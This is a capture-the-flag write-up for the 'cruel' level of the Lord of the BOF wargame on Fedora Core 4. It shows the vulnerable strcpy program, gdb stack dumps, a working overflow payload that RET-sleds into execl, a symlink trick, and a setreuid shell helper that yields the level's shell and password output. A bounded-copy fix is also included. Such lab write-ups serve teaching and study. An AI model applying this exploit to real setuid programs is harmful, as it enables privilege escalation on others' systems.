/*
    The Lord of the BOF : The Fellowship of the BOF
    - cruel
    - Local BOF on Fedora Core 4
    - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}




In this level, too, the overflow happens when strcpy copies into buffer.

The plan is to use execl: RET-sled into it so that a garbage value already sitting on the stack becomes its first argument, then create a symbolic link whose name is the string that first argument points to, and attack through that link.
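As an added example (not part of the original writeup or the wargame binary), here is the same 256-byte buffer with a bounded copy in place of strcpy, so an oversized argv[1] such as the 260-byte "A" probe used below is refused before anything is written, instead of overwriting the saved return address; the function names are my own:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUF_SIZE 256   /* same buffer size as cruel */

/* Copy src into dst only if it fits, NUL included.
 * Returns 0 on success, -1 if the input would overflow dst. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size) return -1;   /* needs len+1 bytes, only dst_size available */
    memcpy(dst, src, len + 1);
    return 0;
}

/* cruel's main() logic with the bounded copy: returns 0 if the argument was
 * copied and printed, -1 if it was refused before any write to buffer. */
int echo_arg(const char *arg)
{
    char buffer[BUF_SIZE];
    if (bounded_copy(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return -1;
    }
    printf("%s\n", buffer);
    return 0;
}

/* Feed an argument of len 'A' bytes (like the python probes below) and report
 * echo_arg's verdict; 260 'A's plus "BBBB" is the probe that hit the saved EIP. */
int accepts_length(size_t len)
{
    char *arg = malloc(len + 1);
    if (arg == NULL) return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    int rc = echo_arg(arg);
    free(arg);
    return rc;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    return echo_arg(argv[1]) == 0 ? 0 : 1;
}
```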


[Source] http://smleenull.tistory.com/305

**Note**

(If the value that lands in execl()'s second argument is 0x00000000, a segmentation fault occurs.)




(gdb) p execl
$1 = {<text variable, no debug info>} 0x832d68 <execl>
0x08048451 <main+109>: ret

RET = 0x08048451
execl = 0x832d68




(gdb) b* main+109      // the ret instruction

Breakpoint 1 at 0x8048451

(gdb) r `python -c 'print "A"*260+"BBBB"'`

Starting program: /home/dark_stone/crue3 `python -c 'print "A"*260+"BBBB"'`

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x9b2000

(no debugging symbols found)

(no debugging symbols found)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB



Breakpoint 1, 0x08048451 in main ()
(gdb) x/30wx $esp
0xbfc417bc: 0x42424242 0x00000000 0xbfc41844 0xbfc41850
0xbfc417cc: 0xbfc41800 0x00795898 0x007a3878 0xb7f41690
0xbfc417dc: 0x00000001 0x008caff4 0x007a2ca0 0x08048454
0xbfc417ec: 0xbfc41818 0xbfc417c0 0x007bad44 0x00000000
0xbfc417fc: 0x00000000 0x00000000 0x0079ae60 0x0079613d
0xbfc4180c: 0x007a2fb4 0x00000002 0x08048340 0x00000000
0xbfc4181c: 0x08048361 0x080483e4 0x00000002 0xbfc41844
0xbfc4182c: 0x08048454 0x080484b0


(gdb) r
Breakpoint 1, 0x08048451 in main ()
(gdb) x/30wx $esp
0xbfc5e05c: 0x42424242 0x00000000 0xbfc5e0e4 0xbfc5e0f0
0xbfc5e06c: 0xbfc5e0a0 0x00795898 0x007a3878 0xb7f60690
0xbfc5e07c: 0x00000001 0x008caff4 0x007a2ca0 0x08048454
0xbfc5e08c: 0xbfc5e0b8 0xbfc5e060 0x007bad44 0x00000000
0xbfc5e09c: 0x00000000 0x00000000 0x0079ae60 0x0079613d
0xbfc5e0ac: 0x007a2fb4 0x00000002 0x08048340 0x00000000
0xbfc5e0bc: 0x08048361 0x080483e4 0x00000002 0xbfc5e0e4
0xbfc5e0cc: 0x08048454 0x080484b0
(gdb) 

// The values that stay the same across repeated runs (compare the two dumps, e.g. 0x00000001 0x008caff4 0x007a2ca0 0x08048454 at esp+0x20) can therefore be used as execl's arguments.


(gdb) r `python -c 'print "A"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Breakpoint 1, 0x08048451 in main ()
(gdb) x/30wx $esp
0xbfb7df8c: 0x08048451 0x08048451 0x08048451 0x08048451   // ret address
0xbfb7df9c: 0x08048451 0x08048451 0x08048451 0x00832d68   // execl address
0xbfb7dfac: 0x00000001 0x008caff4 0x007a2ca0 0x08048454   // execl arguments
0xbfb7dfbc: 0xbfb7dfe8 0xbfb7df90 0x007bad44 0x00000000
0xbfb7dfcc: 0x00000000 0x00000000 0x0079ae60 0x0079613d
0xbfb7dfdc: 0x007a2fb4 0x00000002 0x08048340 0x00000000
0xbfb7dfec: 0x08048361 0x080483e4 0x00000002 0xbfb7e014
0xbfb7dffc: 0x08048454 0x080484b0


Now let's find the string that the first argument (the executable path) points to.

(gdb) x/10bx 0x008caff4
0x8caff4: 0x3c 0xad 0x8c 0x00 0x16 0xab 0x7b 0x00
0x8caffc: 0x00 0x00

// The executable file name is 0x3c 0xad 0x8c. Create a symbolic link with this name.
========================================================
[dark_stone@Fedora_2ndFloor ~]$ cat getsh.c 
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setreuid() */

int main()
{
    setreuid(501, 501);  // 501 is cruel's uid/gid
    system("/bin/sh");
    return 0;
}
========================================================

[dark_stone@Fedora_2ndFloor ~]$ ln -s getsh "`python -c 'print "\x3c\xad\x8c"'`"



[dark_stone@Fedora_2ndFloor ~]$ ./cruel `python -c 'print "A"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh- 

sh-3.00$ id

uid=501(cruel) gid=500(dark_stone) groups=500(dark_stone) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 501

come on, come over

sh-3.00$ 


